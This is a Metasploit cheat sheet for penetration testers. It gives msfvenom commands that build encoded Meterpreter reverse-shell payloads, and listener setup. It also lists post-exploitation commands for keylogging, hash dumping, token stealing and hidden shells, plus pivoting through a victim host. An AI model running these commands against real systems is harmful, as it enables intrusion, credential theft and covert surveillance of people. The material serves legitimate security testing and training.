Skip to main content

Table Of Contents

  • Metasploit
    • Metasploit Options
    • Create & Catch Payloads (msfvenom)
    • Start MSF DB (Kali)
    • Meterpreter Pass a Shell
    • Meterpreter Commands
    • Nmap Through Meterpreter Socks Proxy

METASPLOIT

METASPLOIT OPTIONS

  • More info at: https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet-1.webp

  • msfconsole –r <FILE_PATH>.rc | Launch Metasploit and load resource file

  • show exploits | Display exploits

  • show auxiliary | Display auxiliary modules

  • show payloads | Display payloads

  • search <SEARCH_STRING> | Searches module names and descriptions

  • info <MODULE> | Show module information

  • use <MODULE> | Load exploit or module

  • show options | Display module options

  • show advanced | Display advanced module options

  • set <OPTION> <VALUE> | Configure framework options/parameters

  • sessions -v | List Metasploit sessions

  • sessions -k <ID> | Kill Metasploit session ID

  • sessions –s <SCRIPT> | Run Meterpreter script on all sessions

  • jobs -l | List all jobs

  • jobs -k <ID> | Kill given job ID

  • exploit -j | Run exploit as background job

  • route add <IP_ADDRESS> <NETMASK> <SESSION_ID> | Pivoting

  • loadpath <FILE_PATH> | Load 3rd party modules or exploits

  • irb | Live Ruby interpreter shell

  • connect -s <IP_ADDRESS> <PORT> | SSL connect (Acts similarly to Netcat)

  • use exploit/multi/handler | Advanced option allows for multiple shells 

  • set ExitOnSession False | Advanced option allows for multiple shells

  • set ConsoleLogging true | Enables logging

  • set SessionLogging true | Enables logging

CREATE & CATCH PAYLOADS (MSFVENOM)

List available encoders

msfvenom --list encoders

List available payloads

msfvenom --list payloads

Created encoded Meterpreter reverse TCP payload for Windows systems

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x86 -f exe > encoded.exe

Created Meterpreter reverse TCP payload for Linux systems

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f elf > reverse.elf

Start Meterpreter listener

use multi/handler 
set payload windows/meterpreter/reverse_tcp

START MSF DB (KALI)

Start MSF (Kali)

service postgresql start 
msfconsole

METERPRETER PASS A SHELL

  • Note: By default, this module will create a notepad.exe process and inject into it.
# Use module
use post/windows/manage/multi_meterpreter_inject

# Set target IP address to pass the shell to
set IPLIST <IP_ADDRESS>

# Set the target port
set LPORT <PORT>

# Set the session ID to run this module against
set SESSION <SESSION_ID>

# Run the module
exploit

METERPRETER COMMANDS

  • help | List available commands
  • sysinfo | Display system info
  • ps | List processes
  • getpid | List current PID
  • upload <LOCAL_PATH> C:\\Program\ Files\\test.exe | Upload a file to C:\Program Files\binary.exe
  • download <FILE_PATH> | Download file
  • reg <COMMAND> | Interact with registry (reg by itself will list syntax)
  • rev2self | Revert to original user
  • shell | Drop to interactive shell
  • migrate <PID> | Migrate to another PID
  • background | Background current session
  • keyscan_start | Start keylogger
  • keyscan_stop | Stop keylogger
  • keyscan_dump | Dump keylogger
  • execute –f cmd.exe –i | Execute cmd.exe and interact
  • execute –f cmd.exe –i –H -t | Execute cmd.exe as hidden process and with all tokens
  • hashdump | Dumps local hashes
  • run <SCRIPT> | Executes script (/scripts/meterpreter)
  • portfwd add –L 127.0.0.1 –l 443 –r 3.3.3.3 –p 3389 | Create a rule to open port 443 on the attack machine and forward it through the session to target 3.3.3.3 on port 3389
  • portfwd delete –L 127.0.0.1 –l 443 –r 3.3.3.3 –p 3389 | Delete the rule to open port 443 on the attack machine and forward it through the session to target 3.3.3.3 on port 3389
  • background | Background session to interact with msfconsole
  • getuid | List current session owner
  • steal_token <PID> | Steal authentication token from process
  • screengrab | Run plugin to capture screenshot of user session

NMAP THROUGH METERPRETER SOCKS PROXY

# Take note of the Meterpreter ID
sessions

# Add a route through the target host
route add 3.3.3.0 255.255.255.0 <SESSION_ID>

# Setup socks4a server
use auxiliary/server/socks4a

# Run socks4a server (defaults to port 1080)
run

# Edit /etc/proxychains.conf and update with port 1080
socks4 127.0.0.1 1080

# Run Nmap scan against 3.3.3.3 targeting ports 80, 135, and 445.
# This scan will be tunneled through the Metasploit victim host
proxychains nmap -sT -Pn -n -p 80,135,445 3.3.3.3